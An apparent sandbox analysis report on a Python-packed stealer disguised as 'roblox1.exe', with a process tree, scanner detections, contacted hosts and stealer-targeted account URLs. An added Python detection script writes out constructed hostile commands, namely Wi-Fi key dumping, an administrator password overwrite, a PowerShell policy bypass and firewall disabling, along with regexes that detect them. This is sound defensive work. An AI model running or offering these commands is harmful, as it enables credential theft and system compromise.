                  Credentials | Domains | Default Accounts | 112 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 11 Deobfuscate/Decode Files or Information | 1 GUI Input Capture | 2 System Network Connections Discovery | Remote Desktop Protocol | 4 Data from Local System | 12 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | 1 Windows Service | 1 Windows Service | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 GUI Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 11 Process Injection | 1 Timestomp | NTDS | 37 System Information Discovery | Distributed Component Object Model | 1 Email Collection | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 541 Security Software Discovery | SSH | 1 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Valid Accounts | DCSync | 141 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 31 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
Behavior Graph (ID 1577530). Sample: roblox1.exe. Start date: 18/12/2024. Architecture: WINDOWS. Score: 100.
DNS/IP contacted: restores.name, ip-api.com
Sample-level signatures: Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 7 other signatures

Process tree (each node lists the files it dropped, the network endpoints it contacted and the signatures attached to it):

roblox1.exe (48)
    dropped: C:\Users\user\AppData\...\_quoting_c.pyd (PE32+); C:\Users\user\AppData\...\_helpers_c.pyd (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); 31 other files (29 malicious)
    signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    +-- stub.exe (27)
    |     network: ip-api.com (208.95.112.1:80, local port 49712, TUT-ASUS, United States); restores.name (135.181.65.219:443, local port 49722, HETZNER-ASDE, Germany); 127.0.0.1 (ASN unknown, country unknown)
    |     dropped: C:\Users\user\AppData\Local\...\Monster.exe (PE32+); C:\Users\user\AppData\...\system_info.txt (identified as Algol); C:\Users\user\AppData\...\process_info.txt (ASCII); 3 other malicious files
    |     signatures: Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Tries to harvest and steal browser information (history, passwords, etc); 5 other signatures
    |     +-- cmd.exe (1)
    |     |     signatures: Encrypted powershell cmdline option found; Bypasses PowerShell execution policy; Uses netstat to query active network connections and open ports; 3 other signatures
    |     +-- cmd.exe
    |     |     signatures: Overwrites the password of the administrator account; Gathers network related connection and port information; Performs a network lookup / discovery via ARP
    |     |     +-- net.exe
    |     |     |     signatures: Overwrites the password of the administrator account
    |     |     |     +-- net1.exe
    |     |     |     +-- conhost.exe
    |     |     +-- systeminfo.exe
    |     |     |     signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
    |     |     |     +-- WmiPrvSE.exe
    |     |     +-- net.exe
    |     |     |     +-- net1.exe
    |     |     +-- 15 other processes
    |     |           +-- quser.exe
    |     |           +-- net1.exe
    |     |           +-- net1.exe
    |     |           +-- net1.exe
    |     +-- cmd.exe (1)
    |     |     +-- WMIC.exe (1)
    |     |           signatures: Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes); Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
    |     +-- 12 other processes
    |           signatures: Tries to harvest and steal WLAN passwords
    |           +-- powershell.exe (11)
    |           +-- taskkill.exe (1)
    |           +-- mshta.exe
    |           +-- 9 other processes
    +-- conhost.exe
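The behavior graph names the signatures Joe Sandbox fired on each process but not the command lines behind them. The script below is an added example, not Joe Sandbox code and not the malware's own code: it replays the same parent/child chain as constructed process-creation events (every command line is an assumption chosen to trigger the named signature), scores each process with rules that mirror the signature names in the graph, and adds a parent-level "discovery burst" rule for the netstat/arp/systeminfo/quser/net cluster that one cmd.exe spawns. The rule names, the event values and the benign control at the end are all constructed here.

```python
"""Process-tree triage for the chain in the behaviour graph above (added example; not Joe Sandbox
code and not the malware's code). SAMPLE_EVENTS is CONSTRUCTED to mirror the graph's parent/child
edges; every command line is an ASSUMPTION chosen to trigger the named signature, because the
report shows only process images and signature names."""
import re
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:            # one process-creation event (Sysmon EID 1 / Security 4688 style)
    pid: int
    ppid: int
    image: str              # executable basename
    cmdline: str

B64 = "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA=="   # placeholder -EncodedCommand payload
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "roblox1.exe", "roblox1.exe"),
    ProcEvent(1364, 1000, "stub.exe", "stub.exe"),
    ProcEvent(2100, 1364, "cmd.exe", "cmd.exe /c powershell -ExecutionPolicy Bypass -EncodedCommand " + B64),
    ProcEvent(2101, 2100, "powershell.exe", "powershell -ExecutionPolicy Bypass -EncodedCommand " + B64),
    ProcEvent(2200, 1364, "cmd.exe", "cmd.exe /c net user Administrator P@ssw0rd! && arp -a && netstat -ano && systeminfo && quser"),
    ProcEvent(2201, 2200, "net.exe", "net user Administrator P@ssw0rd!"),
    ProcEvent(2202, 2200, "arp.exe", "arp -a"),
    ProcEvent(2203, 2200, "netstat.exe", "netstat -ano"),
    ProcEvent(2204, 2200, "systeminfo.exe", "systeminfo"),
    ProcEvent(2205, 2200, "quser.exe", "quser"),
    ProcEvent(2300, 1364, "cmd.exe", "cmd.exe /c wmic startup get caption,command"),
    ProcEvent(2301, 2300, "WMIC.exe", "wmic startup get caption,command"),
    ProcEvent(2400, 1364, "netsh.exe", 'netsh wlan show profile name="HomeWiFi" key=clear'),
    ProcEvent(2500, 1364, "mshta.exe", "mshta javascript:close(window.alert('x'))"),
    ProcEvent(2600, 1364, "attrib.exe", r"attrib +h +s C:\Users\user\AppData\Local\MonsterUpdateService"),
    ProcEvent(2700, 1364, "netsh.exe", "netsh advfirewall set allprofiles state off"),
    ProcEvent(3001, 900, "cmd.exe", "cmd.exe /c ipconfig /all"),   # benign control: one discovery tool
    ProcEvent(3002, 3001, "ipconfig.exe", "ipconfig /all"),
]

def _grep(ev, pattern, *images):
    """True if the event's image is one of `images` and its command line matches `pattern`."""
    return ev.image.lower() in images and re.search(pattern, ev.cmdline, re.I) is not None

def encoded_powershell(ev):
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...) and -ec,
    so test the flag token followed by a base64 blob rather than one fixed spelling."""
    if ev.image.lower() not in ("powershell.exe", "pwsh.exe", "cmd.exe"):
        return False
    return any(m.group(1).lower() == "ec" or "encodedcommand".startswith(m.group(1).lower())
               for m in re.finditer(r"-(e[a-z]*)\s+[A-Za-z0-9+/=]{20,}", ev.cmdline, re.I))

def admin_password_set(ev):
    """`net user <account> <password>`: a positional second argument that is not a /switch sets it."""
    if ev.image.lower() not in ("net.exe", "net1.exe", "cmd.exe"):
        return False
    m = re.search(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+[^/\s]\S*", ev.cmdline, re.I)
    return m is not None and m.group(1).lower() == "administrator"

SH = ("powershell.exe", "pwsh.exe", "cmd.exe")
RULES = [                   # (signature name as it appears in the report, predicate)
    ("Encrypted powershell cmdline option found", encoded_powershell),
    ("Bypasses PowerShell execution policy",
     lambda ev: _grep(ev, r"-e(?:p|x[a-z]*)\s+(?:bypass|unrestricted)\b", *SH)),
    ("Tries to harvest and steal WLAN passwords",
     lambda ev: _grep(ev, r"wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear\b", "netsh.exe", "cmd.exe")),
    ("Overwrites the password of the administrator account", admin_password_set),
    ("Uses netsh to modify the Windows network and firewall settings",
     lambda ev: _grep(ev, r"\badvfirewall\b|\bfirewall\s+(?:add|set|delete)\b", "netsh.exe", "cmd.exe")),
    ("Uses attrib.exe to hide files", lambda ev: _grep(ev, r"(?:^|\s)\+[hs]\b", "attrib.exe", "cmd.exe")),
    ("Queries sensitive information via WMI (Win32_StartupCommand, Win32_LogicalDisk, Win32_NetworkAdapter)",
     lambda ev: _grep(ev, r"\b(?:startup|logicaldisk|nic|nicconfig)\b|win32_(?:startupcommand|logicaldisk|networkadapter)", "wmic.exe", "cmd.exe")),
    ("Sigma detected: MSHTA Suspicious Execution 01", lambda ev: _grep(ev, r"vbscript:|javascript:|https?://", "mshta.exe")),
]
DISCOVERY_TOOLS = {"netstat.exe", "arp.exe", "ipconfig.exe", "systeminfo.exe", "quser.exe",
                   "net.exe", "net1.exe", "wmic.exe"}

def triage(events, burst_threshold=3):
    """Map pid -> sorted signature names. Per-event rules run on each command line; the burst rule
    fires on a parent that spawned at least burst_threshold distinct discovery tools."""
    hits = defaultdict(set)
    children = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(ev)
        hits[ev.pid].update(name for name, pred in RULES if pred(ev))
    for ppid, kids in children.items():
        tools = sorted({k.image.lower() for k in kids} & DISCOVERY_TOOLS)
        if len(tools) >= burst_threshold:
            hits[ppid].add("Gathers network related connection and port information (discovery burst: "
                           + ", ".join(tools) + ")")
    return {pid: sorted(names) for pid, names in hits.items() if names}

def ancestry(events, pid):
    """Image chain from the tree root down to pid, e.g. ['roblox1.exe', 'stub.exe', 'cmd.exe', 'net.exe']."""
    by_pid = {ev.pid: ev for ev in events}
    chain = []
    while pid in by_pid and len(chain) < len(by_pid):      # length bound guards against ppid cycles
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain[::-1]
```

Run `triage(SAMPLE_EVENTS)` and print each hit with `ancestry()` to get a lineage such as roblox1.exe > stub.exe > cmd.exe > net.exe next to its signature, which is what the graph above shows without the command lines. The per-event rules deliberately accept cmd.exe as well as the tool image, since `cmd /c` carries the whole command line before the child even starts; the burst rule is what separates the stealer's recon cluster from a user shell that runs a single `ipconfig`.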

Source | Detection | Scanner | Label
roblox1.exe | 55% | ReversingLabs | Win32.Phishing.MonsterStealer
roblox1.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe | 55% | ReversingLabs | Win32.Phishing.MonsterStealer
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_cffi_backend.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_multiprocessing.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_overlapped.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_queue.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_sqlite3.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_uuid.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_helpers.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_parser.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_writer.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_websocket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\cryptography\hazmat\bindings\_rust.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\frozenlist\_frozenlist.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libcrypto-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libffi-7.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libssl-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict\_multidict.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\pyexpat.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python310.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | 71% | ReversingLabs | Win64.Trojan.PySpy
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\unicodedata.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_helpers_c.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_quoting_c.pyd | 0% | ReversingLabs |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
https://www.attrs.org/) | 0% | Avira URL Cloud | safe
https://twitter.comarefereruhttps://twitter.com/homeusec-fetch-destaemptyusec-fetch-modeacorsusec-fe | 0% | Avira URL Cloud | safe
https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization) | 0% | Avira URL Cloud | safe
https://www.attrs.org/en/latest/names.html) | 0% | Avira URL Cloud | safe
https://www.attrs.org/en/stable/changelog.html | 0% | Avira URL Cloud | safe
http://docs.aiohttp.org/en/stable/logging.html#format-specificationauvloopaset_event_loop_policyaEve | 0% | Avira URL Cloud | safe
https://www.variomedia.de/ | 0% | Avira URL Cloud | safe
https://bugs.python.org/issue37179 | 0% | Avira URL Cloud | safe
https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-config | 0% | Avira URL Cloud | safe
https://filepreviews.io/ | 0% | Avira URL Cloud | safe
https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)). | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
restores.name | 135.181.65.219 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://account.riotgames.com/api/account/v1/user | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://accounts.reddit.com/api/access_token | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9 | stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/pyca/cryptography/issues/8996 | roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/python-attrs/attrs/issues/251 | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://klaviyo.com/ | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://tiktok.com/ | stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.python.org/dev/peps/pep-0506/ | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://i.instagram.com/api/v1/accounts/current_user/?edit=trueuhttps://i.instagram.com/api/v1/users | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://github.com/aio-libs/aiohttp/discussions/6044 | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://python.org | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://python.org/dev/peps/pep-0263/ | roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmp | false | | high
https://www.attrs.org/en/24.2.0/_static/sponsors/ | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://python.org:80 | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/sponsors/hynek | stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/python-attrs/attrs/issues/1328) | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://oauth.reddit.com/api/v1/me | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek). | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-api.com/jsonacityatimezoneaispaorgaasuMain.GetNetworkInfoT | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization) | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/python-attrs/attrs) | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.attrs.org/) | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ibm.com/ | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://twitter.com | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.reddit.com/user/acomment_karmaatotal_karmaais_modais_goldais_suspendedaprofileUrlu | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://gql.twitch.tv/gqlT | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://twitter.com/home | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://discord.com/api/v9/users/ | stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.roblox.com/my/account/jsonuhttps://economy.roblox.com/v1/users/aresaUserIdu/currencyuhtt | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
http://docs.python.org/3/library/subprocess#subprocess.Popen.kill | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/python-attrs/attrs/issues/136 | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba | stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.aiohttp.org/en/stable/logging.html#format-specificationauvloopaset_event_loop_policyaEve | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
